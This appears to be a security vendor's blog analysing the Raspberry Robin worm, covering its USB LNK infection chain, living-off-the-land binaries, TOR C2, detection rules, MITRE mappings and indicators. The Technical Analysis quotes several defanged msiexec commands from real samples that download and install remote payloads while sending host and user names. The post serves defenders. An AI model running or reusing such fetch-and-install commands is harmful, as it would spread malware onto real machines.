Background
Earlier this year, Red Canary Intelligence posted a blog about a worm, named Raspberry Robin, that spreads over removable external drives and utilizes compromised QNAP devices as command-and-control servers. The adversary has also been dubbed as LNK Worm or QNAP Worm by researchers and its first occurrence dates back to September 2021. Raspberry Robin does not seem to exploit any vulnerability at this point, and it is unknown how external drives are infected to propagate its activity.
Raspberry Robin has been observed on networks globally, particularly in Europe, belonging to customers in the technology and manufacturing sectors. Compromised QNAP servers which acts as primary C2 infrastructure for the adversary are distributed worldwide, especially seen from Venezuela and Germany.
Although there is no particular information of Raspberry Robin being affiliated to any specific threat actor or group due to the fact that complete actions on objective are still unknown, recent Microsoft research revealed that FakeUpdates malware is being spread through existing Raspberry Robin infections, which in turn deploy payloads that resemble activity with Evil Corp. This links the worm to have an imaginable connection with the Russian cybercrime group to remodel itself to the RaaS ecosystem.
Technical Analysis
Initial Infection is usually observed through infected removable drives which contain .lnk file(s) camouflaged as legitimate shortcut icons of network shares/usb devices/external media.When the infected drive is connected, cmd.exe is instantiated which reads and executes from another malicious file stored on the removal drive, followed by an instance of explorer.exe with ambiguous command line parameters.
After the initial infection, an instance of msiexec.exe is created to download msi payload from a compromised QNAP server, that performs several checks to verify the client through the connection url and parameters.
Below are the msiexec executions observed in some of the samples,
msiexec /q-i""http[:]//tiua[.]uk:8080/KsfTzMvq6Ke/%computername%=%username%""
MSiExeC /Q-i""hTTP[:]//c7[.]lC:8080/lfVxCjFjm1l/!cOmputERNaME!""
MsiEXEC /Q-I""htTp[:]//J2[.]gy:8080/i0pd0DFFaGt/!cOmpUteRnAmE!""
msiexec -Q/I ""hTTP[:]//u0[.]pm:8080/80wOpGuotSU/%coMpUTERnAmE%?%USeRname%""
As the installation proceeds, the msiexec.exe command listed above creates another msiexec.exe process with the command line parameter /V which connects to secondary compromised QNAP server on the same 8080 port and loads a notably obfuscated and malicious dll which is stored in C:\Windows\Installer\
Copy of above stated dll also exists in C:\Users\<user>\AppData\Local\Temp for the adversary to achieve persistence in later stages.
During the overall execution process, various living of the land binaries are used,
- fodhelper.exe spawns rundll32.exe to execute a malicious command.
- rundll32.exe starts odbcconf.exe and passes additional commands to execute and configure the recently installed malicious DLL.
- odbcconf.exe has a built-in regsvr flag similar to regsvr32.exe
Outbound C2 channel is established through regsvr32.exe, rundll32.exe, and dllhost.exe executing without command-line parameters, generating external network connections to IP addresses associated with TOR nodes.
To become a persistent threat on the victim machine, Raspberry Robin installs itself into the run key on the user’s hive to load the dll from the temporary directory to replicate the same infection chain and C2 communication stated above.
NetWitness Detections
After analyzing samples from various sources and referring to research articles, following are existing NetWitness Detections, that aid in identifying not just Raspberry Robin’s malicious activity, but other adversaries as well that might employ similar techniques.
App Rules (Endpoint):
- boc = ' runs chained command shell'
- boc = 'runs msiexec with http argument'
- boc = 'unexpected explorer.exe parent'
- boc = 'runs rundll32 with http argument'
- boc = 'potential abuse of odbcconf'
In addition to the existing content, we have also created new rules to better detect host and network activity related to Raspberry Robin. All of the following are currently available from NetWitness Live:
- Raspberry Robin C2 Communication (Packet)
- cmd.exe Reads and Executes From File (Endpoint)
- Outbound Network Connections From DLL Utility Without Arguments (Endpoint)
- Unexpected fodhelper.exe Parent (Endpoint)
MITRE ATT&CK Techniques
T1091 - Replication Through Removable Media
T1059.003 - Command and Scripting Interpreter: Windows Command Shell
T1218.007 - System Binary Proxy Execution: Msiexec
T1218.011 - System Binary Proxy Execution: Rundll32
T1218.008 - System Binary Proxy Execution: Odbcconf
T1218.010 - System Binary Proxy Execution: Regsvr32
T1071.001 - Application Layer Protocol: Web Protocols
T1204.002 - User Execution: Malicious File
T1584.004 - Compromise Infrastructure: Server
T1548.002 - Bypass User Account Control
Conclusion
Raspberry Robin operates in highly infectious and evasive fashion with the use of LOLBins, mixed usage of upper-case and lower-case letters along with irregular spacing in the command line parameters, heavy obfuscation, TOR-based C2, process injection and abuse of compromised QNAP devices. This threat is still a mystery in several ways, with greater targets yet to unravel.
Resources mentioned in this blog post will be helpful to effectively monitor, detect & further respond using the NetWitness Platform.
Indicators of Compromise (IOCs)
- 1a5fcb209b5af4c620453a70653263109716f277150f0d389810df85ec0beac1
- f89b5ef68b23921fffd500edd254c2d44264e9f20eb682dc97ecdd97ed5fe6f6
- c0a13af59e578b77e82fe0bc87301f93fc2ccf0adce450087121cb32f218092c
- 6fad3552f6b6cefcc27be589c3a687b2
- 208.95.236[.]14
- 219.77.149[.]149
- 179.60.150[.]126
- 176.25.167[.]244
References
